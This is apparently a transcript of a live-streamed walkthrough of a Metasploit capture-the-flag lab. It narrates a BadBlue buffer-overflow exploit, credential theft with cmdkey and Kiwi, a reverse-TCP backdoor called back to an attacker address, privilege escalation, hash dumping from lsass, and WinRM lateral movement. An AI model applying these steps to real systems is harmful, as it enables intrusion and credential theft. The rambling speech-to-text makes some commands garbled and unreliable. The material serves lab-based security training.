Yeah, good afternoon, guys. So here I actually discuss today about Metasploit. So what is actually the Metasploit I'm actually discussing on here? Yeah. So I hope so. Good afternoon, guys. So here I actually discuss today. So discuss on here. Let me check. Okay. So about the Metasploit. So first of all, we just actually discuss here. So what is actually the Metasploit? So the Metasploit is an open source framework used for actually used for the penetration testing and the exploit development, and it is available for the Mac OS, Windows and the Linux operating system. The Metasploit gives us the wide array of the community contributed exploit and the attack vector. Sorry for the spelling mistake. And the attack vectors that can be used against the various system and the technology. Moreover, it is extensible and can be used for the automated your own exploit. And the Metasploit has a web interface, command line interface and the console interface. Everyone know about who are actually working with the Metasploit framework. So the command to open the Metasploit framework from your terminal, the command is Msf Console. So there is some basic workflow in the Msf Console. The first is identifying the vulnerable service and searching for a proper exploit for that service, loading and configuring the exploit, loading and configuring the payload want to use, and running exploit code and getting access to the vulnerable machine. So this one is actually the link about the Metasploit framework. So I'm not actually wasting here the time. So there is actually the CTF for the Metasploit, and that CTF is actually the community lab, and I actually doing this CTF from the attack defense lab, which one is actually designing on the maintaining and the funded by the Pentester Academy, and this one is a community version, so anyone can practice on here. So first of all, whenever I just open this one, so the target machine IP is here. The first machine IP address is this one, and the second machine IP address is this one. So first of all, I just actually, this is actually the target IP address. So for the target IP address, let me check with this. I just copy this one. And paste it over here. Now I just minimize this one and just open a terminal. And first target IP is actually mine. I just copy this target IP. So firstly check with this one. So I just copy it, and I just using here my favorite tool, Nmap. So I run a Nmap Scan against the first target IP. So the command is Nmap, and I just only do the, there's a lots of switches you can use inside of Nmap. So I here is actually using the version scanning, and I just do the node ping and just copy that IP address. Copy this IP address and just firstly hit enter. And just wait for the scan result. So I can also be scan this one. This is actually the TCP scan I just doing here. I just copy this IP address. I maximize this terminal. Open a new tab. So here is actually the 3444 SMB, and the operating system here they are using like a Windows operating system, and there's a ports are open, the 44, 80, 80, 135 SMB. SMB is working on here in the 445, and the RTP also working 3389. Okay, Perfect. So I just open the bad blue HTTPD 2.7. Bad blue. So here is actually the bad blue, and the bad blue is actually the here the exploit. So check on the exploit on the HTTP bad blue. YouTube live, bad blue HTTP, and the HTTP bad blue that I am actually using on here. So they give me the result like this is actually the bad blue HTTP 2.7. So search for the vulnerabilities. These vulnerabilities is available or not. 2.7 bad blue, and just simple. I just check from here from my open source engine. Wow, the buffer overflow, the pass-through buffer overflow. So this one is actually the here. They actually showing me the pass-through. So you can also be checked on another way. So here I actually using the command line interface tool like a Searchploit, and just type here like a, just wait a minute. I can use here the Searchploit. So what is actually the bad blue? Correct. So I just actually using the bad blue on here. Just type the bad blue. Let me check. Yes, the bad blue. And see here, you can also be check on here from here the bad blue. And let me check what is the C. So the same thing, the same result. Check here the bad blue 2.72. So firstly, what is actually here? So we are identifying the vulnerable service, the basic workflow, the identifying a vulnerable service. So here is actually we are identifying the basic vulnerable service. So from the Searchploit, we actually get some information. Where is the Searchploit? Yes, the Searchploit, we're getting the pass-through buffer overflow from the Metasploit. So now we just open our Msf Console with -Q option. With -Q option, and just search for it, correct? So search and just type bad blue. So here is actually the bad blue pass through is here. So let me check with this. So first of all, from the Nmap, we have discovered that on port 80 bad blue is running on the HTTP 2.7, and I'll search at the exploit module for the bad blue file server using the Searchploit, or otherwise you can also be search from your open source search engine. And whenever I just type the Searchploit, and the bad blue is giving me the some information like this one, the pass-through buffer overflow, which I can exploit from Metasploit. So the bad blue to HTTP 2.72 is vulnerable to pass-through buffer overflow and exploiting the target server using the Metasploit framework. So for this one, I just maximize this screen. So I just actually using the search option, and from the search I just getting the bad blue pass through. So I just use this model. So whenever I just use this one, so use one, just wait for a minute. Sorry guys, so the pass through, and from the pass through, whenever I just getting this one, so I just check the options from here. So simply type here the options or the show options, you can type anything. So here is my actually the listening host IP address, means my attacker mission's IP address, and here is a requirement for our host. So our host I just actually given on here. So how to run the set our host, and what is my IP address on here for this machine. Okay, now set our host. So whenever I just in the set our host, now I just again re-verifying it with the show options or options. Yes, done. I just open in a file, I just open a new tab and just type if config. Yeah, it takes a 3.2 on this one. ETH0 is running on the 1.2 and subnet marks they are using 3.2 and this one. Okay, 3.10.10.3.2. Okay. So let me check is a bad blue and the target is actually the exploitable on here. So just I type exploit. The Metasploit session 1 open. So let me wait for that. Yes, I got it. So firstly I just type. You can also go with the help option. There is a lots of command you can use inside of Metasploit. And right now I just actually using the first command is a ccl4. Let me get the information about that. This is a Windows operating system, Windows Server 2016, I hope. And architecture they are using the x64, and work group is like this one, and work group is this one. Now the next command I just type get UID, user identification. So that active and HTTP user identification is here. So whenever I just get this one, so firstly I just type pwd, and the pwd, this is actually the program file, this is a path, the bad blue EE. So now I just actually using the search command inside of the Metasploit and just check any HF, H is a help banner, recursively search the subdirectories, D directory tag to begin with this one, file pattern. Okay, I just type here search -f flag, and I just check with like this one asterisk. I just change the search formula. Let me check. If there is any flag, so might be can search from there. If there is any txt file, just waiting for some time, otherwise we just do the another process. I don't really know, so I just type here cd backslash pwd is a program file, pwd C drive is actually on the C drive, and inside of the C drive I just enumerate this one, search -f and flag the asterisk .txt. Global search for this one -nr equals to it takes a little bit time. Okay, it takes a little bit time. I just type a shell access on the C drive. I just firstly check this one, the directory, and here is actually the users directory, cd users, and check the directories. What is the directories are there? The administrators also be here. So firstly check with the http user and check the what is actually the inside of the http user, the desktop. So cd desktop, it is not working here, and dir, wow, the gotcha, I just actually kept this one. Okay, so to check what is actually the inside of the flag, and flag1.txt is my first flag. Okay, so re-verified it, verifies flag, and the flag one is here, and go to here. I just copy this flag because this is actually the one type of proof that I just successfully exploited. Copy it and right click and paste it here and check. Yes, it's verified. So now I just actually checking all the stored credential with the CMT key. You can from the CMT key you can also be check actually the CMT key is like a utility, and in this utility is actually check for the store, delete, and the list of windows, and the Windows web credential is actually check on this one. So I just actually go to the cd. Okay, cd dot and I just use the dir, the program files. I just copy this one. And just save it here. dir I just going here and just check the dir, and I just gave them my first bad blue. Auto key is actually not working. Okay, so inside there I just actually using the CMT key. So how to use the CMT key? Just type the CMT key and key list. So here is actually the information stored credential like a domain name. The target is legacy generic in the administrator, and the domain password is actually enter the domain password. So here I just observe here the interactive credential of the administrator. Of the administrator user have been stored here, and I can run any executable with the administrator privilege. And there is a one utility I just using. After that, that utility name is a run as .exe. So let me check. I just actually wait for this one. I just actually right now I control C it and just Y and come to the Metasploit session, and I for the post exploitation which is I just using the Kiwi plugin. So I just load Kiwi and hit enter, and I just access on this Kiwi and find the plain text credential from the vault. So what is actually this? If you type here the help now, if you type help on here, so this is actually the things are here. You can also use the Kiwi CMD. I just using right now the Kiwi CMD. So Kiwi, what is the underscore, correct? Yeah. Kiwi CMD. I just type here, and I just finding the credential vault and type here the cred and hit enter. So let me check. So attack defense credential. Oh, the administrator is the credential I get on. I got the Bob the Builder. So anything else? The credential like the Bob the Builder I just activating. The flag 2 is this one. I just happily copy this one. Plain text password for administrator user and click on verify. Let me check. Wow, it's verified. So we have discovered here the administrator user password for the first target machine. Now I just actually generating the malicious executable file from I just actually creating the payload. That is actually the payload is known as the malicious executable file. I just using the tools like Msf. So here I actually use Msf, and for the Msf I just type the command here. So Msf -p for the payload. The Msf is a utility to create a payload or the encoder payload. You can do lots of things from Msf. So right now I just actually creating the payload from this Msf. The Windows Metasploit reverse underscore TCP and lhost. I just provide my attacker machine IP address, the 10 this one IP address I just put on here 10.10.3.2 and N port I using here 4444 and file format I just in the exe file format and creating a file, the name of anything like a backdoor.exe. The redirection is just giving the output backdoor.exe. Because if you check on here get UID, so I am actually the server username is a HTTP user. I am not getting the admin privilege on this Metasploit session. No org selected, the backdoor platform user payload Windows Metasploit. Where is actually I'm doing any error is here. Okay, let me check this. Windows Metasploit reverse underscore TCP port and the file format I was giving this one. No org selected, data only one option play the positive 10 port. Okay, sorry, I just actually given the space on here. so that's why it's showing me the error. There's no any space. Now I just creating this payload. Now I just actually using this payload. Check the file backdoor.exe. So this one is actually the P32 executable file for the Intel for MS Windows. So I can actually use this payload on Microsoft Windows. Now I just actually upload this backdoor.exe inside of that previous machine on this machine. So how I can? So I actually uploading this backdoor.exe inside of the temp folder. So in the STL I just go to the, I firstly check with the PWD, there the C drive. So I just actually using the C, there's a path is the users. Okay. In the metadata session we are using the double backslashes. Under the user there's the HTTP users, and there's, you can also be check the path because I just actually did this machine local, and there's a temp operation. The system cannot find the path in the local app data HTTP. Yes. So whenever I just actually now check with the PWD. So you can also be using the shell command and do inside of the directory. That is up to you. And just type here the ls. So ls is here. In the ls there is actually some executable. The name is one. The one directory is here. Now I just actually upload my backdoor.exe on this place. Now check with the ls. So it's successfully, it's actually the upload this one. So start another one. I just actually open the another terminal, new tab, and I just open the Msf Console and -q, and here I actually using the exploit multi-handler exploit module. Use exploit multi-handler, and there is a generic, but I'm not using this generic one because of the Msf phenom. I just using this on Windows Meter reverse TCP. So firstly just set payload using the set command to set a payload. So what is using Windows Meter reverse underscore TCP. I just set my payload, set lhost 10.10. What is the IP address I am using here? 10.10.3.2. Okay, set L port. I am using here in the Msf phenom the 4444. Okay, so I just actually set all the things on here, and I just try to execute. I just actually firstly check with the show options. Yeah, the payload is actually generated. Exit function. Okay, fine. I just actually type the exploit. Whenever I just actually type the exploit, so now I just actually go to the shell, inside of the temp directory. I just actually in the directory I just check Inside of the temp directory, this is actually the things are here, the backdoor.exes are here. Now I just actually using my run as exe, and save create, and user is my administrator. And just run the backdoor.exe. So firstly verified, run as .exe, save create, user is here, and hit enter. Wow, it's run. Now I just open this one, I get a Metasploit session. Okay, now get UID. See, before in this Metasploit, in the Metasploit session, whenever I just type the get UID, I get the HTTP user. Now I successfully escalate the privilege. So here is actually now this one is here. Now I just actually go to shell system32, not as a cd, and type a dir cd users dir cd administrator dir cd desktop dir. My flag.txt is there. To open this, type flag3.txt. So this one is my third flag. I just copy it with the Ctrl+Shift+C and the flag3 v and verify. Let me check. So here we actually running the I am running as a administrator user this one, and now using the same process like a Cmt key. So how to open the Cmt key? So firstly we just actually go to the cd Windows is still 32, and same process, Cmt key and list. So user, so what is actually the thing? The correctly stored is actually the legacy target WinRM server, the type is generic, and the jump user. So you can notice on here that is a stored credential for the jump user. The user is a jump user. So again we just actually load the Kiwi plugin to find the jump user credential. So for that one, the same process, I just actually given the Ctrl+C, yes, and successfully I just type again. Okay, I just actually doing the load Kiwi. So Kiwi is actually again run, and the same command Kiwi cmd fault and create. The Win server, the jump user, and the credential is this one. Or the jump user, the credential. So the plain text password for the jump user. So we actually get here our fifth flag. Copy this one. The flag is like a prove your proof. You successfully exploit that one. The plain text of the jump user. So I have discovered the feed flag from here. So now I will dump the Windows user hashes to find more flags and migrate in the lshash.exe process. So let me check if the it comes on here. I can check the process list. How many processes are running? So if I type here process -h, so -a, -c, -capital S filter on process name. So firstly check the process name, that process is running or not. Okay, sorry. Yes, this process is running with the empty authority on the system. Okay, and the PID value is here is a 792. So I migrate this PID value. So migrate -h, you can do the command, the PID value, the migrate the server instance to the another process, and any open channel to the other dynamic state will be lost. So I just actually the migrate 792 with this process. Whenever I successfully migrate it, so I just type here the hash term. So whenever see, so this is actually the what is actually the asking the fourth flag, the administrator user NTLM hash, new technology LAN manager, like this one. So the NTLM hash for the administrator is this one. Control Shift C. Can I crack station? Otherwise you can also use the hash killer. Okay, fine. So I just getting this one. So we got this one from here. So what is actually the asking the 6 flag and the 7 system key, the sys key for of the first machine, administer the second machine, use the NTLM hash. So the system key. So for the system key, how you found the system key? This is a very, so if you type here the help option, so that actually the LSA dump secrets. I just copy this one and paste it here, the LSA dump. So this is actually the attack defense system key. I just actually this is a system key. I just copied the Control Shift C and paste it here. So my 6 flag, I just connected the 6 flag with the now 15 to 18. So this is actually the 6 flag that the jump user, the second target machine. So for the second target machine, I just actually now let me check on the second target machine what is the thing something. The -SB, the second target machine is showing with nothing but this host is up. So what I'll do, I just actually doing the simple single. He's showing me the nothing on here, since the host is down. Okay. Let me check. What is the question? The administrator user NTLM hash from the second machine. Administrator user from the second machine. If I check on this one, my administrator user might be my jump user. I just run this one. Let me check. Let's call this up. As dump. The process are running. Yes, just not. Yeah, the jump user. So I actually copy this one. Jump user, and the password of this credential is actually the password for this administrator, and this target name is actually that the administrator user is a WinRM server. So WinRM server, WinRM server port number. By default WinRM server is this one, but default port is actually the 5985. So let me check 5985. So I just open the new tab and check with the target, and I just check with the target this port number is particularly open or not. -P 5985. And I just copy this IP address, the Control C, and paste this IP address on here. Wow, the 5985 is open. Okay, so here I just actually this is open. So I have discovered here that WinRM service while scanning the second host using the Nmap. So this one is open, and the jump user credential is very useful to access this second machine. So here we are trying it using the Linux Powershell to connect the WinRM service, and how to run the Powershell. I just open the another tab, new tab, and that is the command is pwsh. So this is actually the PowerShell. So we have successfully launched the PowerShell inside of Linux. So now we store the target server credential in the credential variable. So how you just actually doing this one? Like for the PowerShell, I just using the $grade and using the get credential Okay, the username, they're asking the username. The username is actually the jump user. I just copy this one from here, copy it and paste it here and hit enter, and they're asking for the password. Copy it and paste it here and hit enter. So we enter the target server credential for the connection and the jump user like this one, and now we actually using our target machine, the authentication, so how it is actually access on there. So for this one we are actually using the enter PS session, and we just actually given the IP address. We actually negotiate the authentication, and we actually giving the credential, which one I just taken the variable or a grade. Okay, so how I access on that second machine, this is a very interesting one. So enter minus, I just giving the PS session, and inside of there the computer name, I just actually using the IP address of the second machine. This is my, I just copy this one, Control C, sorry, and paste it here. Now I just giving the authentication. I just type the authentication, the spelling of authentication. Yeah, the authentication is a negotiate. Now I just actually using the credential, the $. So let me re-verify. Enter minus PS session, computer name, authentication is a negotiate, credential is get, hit enter. Okay, I just actually access on the jump user. Okay, now I just type who am I. So the who am I is a WinRM server jump user, and the document is here. So now we just check for our, what is the flag, the 7th and 8th. So if there is any flags are here, so I just actually using this one, cd, yes, in the PowerShell directory. In the directory there is actually the user, cd user, check again the directory, the jump user is here. Wow, cd jump user, check with the directory, check on the desktop, dir, yes, type, I successfully done this one, txt. Now my 8th flag is here, flag number 8. I just copy this one, and when I just copy the 8th flag now, I just paste it here and just verify. Wow. So remaining there's a 2 flags are here, the flag 7 and flag 9. So there is actually the things are here. So let me check I can access on administrator or not. cd dot dir, cd administrator, and type a dir, cd desktop, dir, yes, I got the another flag is a flag 9, flag 9.txt. So I just copy, and just verify it. So last flag. Okay, so the last flag I actually using it here. So we are running right now the STA server module to gain the Metasploit shell again. Okay. So for that we just again open our Msf Console. So everyone know right now how to open the Metasploit framework inside in your terminal. So today actually I'm in YouTube live, that someone is actually inspiring me to do this YouTube live. Whoa. So thank you guys. So they actually given the permission for the. So I just check on here. So let me check another time. I just stop this one. Because I again just do this one. So you just try on this one is actually for the flag 7. So I again it takes a little bit time. So today for that's all guys. So I hope so this one is actually making interest in the Metasploit, and I just love to play with Metasploit. And this one is a Metasploit CTF, and you will also try from this room and get lots of information from this CTF. So thank you guys for today. So meet you on the next time on the new topics. So bye bye, have a great day and happy Ugadi.